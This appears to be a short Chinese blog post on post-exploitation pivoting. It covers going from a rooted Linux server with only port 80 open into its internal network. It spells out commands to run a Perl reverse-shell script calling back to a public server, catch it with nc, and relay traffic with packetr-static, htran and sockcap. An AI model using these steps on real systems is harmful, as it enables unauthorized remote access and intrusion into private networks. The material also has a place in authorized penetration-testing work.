环境:
被攻陷的Linux主机(拿到root权限)-----模拟为我内网的一台Linux服务器 192.168.0.105
hack的操作用机-----我的电脑 192.168.1.101
反弹到公网的服务器-----我自己的公网服务器 61.160.2xx.xxx
渗透测试用的windows测试机 192.168.1.109
工具:
packetr-static Linux下的
htran.exe windows下的
sockcap 用作代理进入内网渗透的利器
过程:
1.我模拟下极度苛刻的情况下的环境,该攻陷的Linux服务器对外不开放22,只存在web端口80,那么我们必须得反弹shell到公网的机器上,这点我虚拟机里面没 这个环境,我就直接说下简要的
上传back.pl文件到linux下的tmp目录下,执行
perl /tmp/back.pl xxx.xxx.xxx.xxx 端口
在公网的服务器上,运行nc执行
nc -l -v -p 端口(跟上面的一样)
现在我弹2个窗口回来,一个开代理,一个转发数据
把packetr-static传上去,执行
./packetr-static -s 1988
一个窗口转发数据,执行
./packetr-static -slave 61.160.20x.xxx 123 127.0.0.1 1988
2.在windows公网端执行,
htran.exe -p -listen 123 1988
3.配置sockcap
4.运行代理程序进入内网
本文来自优快云博客,转载请标明出处:file:///C:/Documents%20and%20Settings/Administrator/桌面/Linux下的内网反弹实例%20-%20linkboy的BLOG%20-%20优快云博客.mht
本文介绍了一种在特定条件下实现从受控Linux服务器通过web端口80进行内网反弹的方法。利用Perl脚本配合网络工具如nc、packetr-static及htran等,在目标Linux服务器(192.168.0.105)与公网服务器(61.160.2xx.xxx)间建立连接,并通过sockcap进一步渗透内网。
389

被折叠的 条评论
为什么被折叠?



